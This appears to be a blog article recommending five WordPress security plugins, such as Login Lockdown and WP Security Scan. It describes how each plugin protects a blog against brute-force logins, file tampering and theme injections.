WordPress, like any other popular script or online service, is heavily targeted by people with malicious intents who try to get access to installations to use the hijacked blogs or services for their malicious activities.
This includes displaying ads to blog visitors or placing links to their sites on the blog or even redirecting the whole blog to another site.
WordPress administrators can improve the security of their blog with several standard practices like selecting a secure password, changing the admin username or disabling features in the blog (like preventing registration or remote publishing).
But there are also WordPress plugins that can increase the blog's security tremendously. The following list contains five WordPress plugins that improve a blog's security.
1. Login Lockdown
Login Lockdown increases the protection against so called brute force attacks. The plugin will log every login attempt and block attempts from IP addresses that try to gain access repeatedly in a short period of time.
The login retries, the retry time interval and the length of the lock out can be configured in the plugins' options.
The list of blocked IP addresses can also provide the webmaster with information about undergoing attacks.
2. WP Security Scan
WP Security Scan scans several key elements of the blog. The plugin checks the WordPress version, table prefix, if the WordPress version is hidden on public pages, if DB errors are turned off, if the ID Meta tag has been removed, if a user admin exists and if a .htaccess file has been placed in wp-admin for extra security.
It can furthermore scan the file permissions of the core WordPress folders (showing what it suggests and the actual permissions), change the WordPress table suffix to protect the blog from zero day attacks and provides access to a password strength checker. Does not need to be active all the time and is useful when you harden the blog against security attacks.
3. Antivirus for WordPress
Antivirus for WordPress scans the active theme folder for malicious injections. It protects the blog against certain forms of exploits and spam injections. Runs in the background and can be configured to notify the admin if a scan finds an anomaly in the theme files.
4. WordPress File Monitor
Note: The plugin has not been updated since 2010. I was not able to find a comparable extension that is updated regularly. While the extension may still work in recent versions of WordPress, I suggest you try it in a local environment first to make sure it does.
The plugin monitors the files of a WordPress blog and notifies the webmaster if any of them have been changed. It can check the file modification date or compare hashes to find modified files.
Folders can be excluded from the scan, important for cache folders for instance with files that change regularly.
5. Secure WordPress
The plugin performs a series of one-time operations on the WordPress blog, specifically:
1. removes error-information on login-page
2. adds index.php plugin-directory (virtual)
3. removes the wp-version, except in admin-area
4. removes Really Simple Discovery
5. removes Windows Live Writer
6. remove core update information for non-admins
7. remove plugin-update information for non-admins
8. remove theme-update informationfor non-admins (only WP 2.8 and higher)
9. hide wp-version in backend-dashboard for non-admins
10. Add string for use WP Scanner
11. Block bad queries
Secure WordPress can be downloaded from the official WordPress Plugin repository.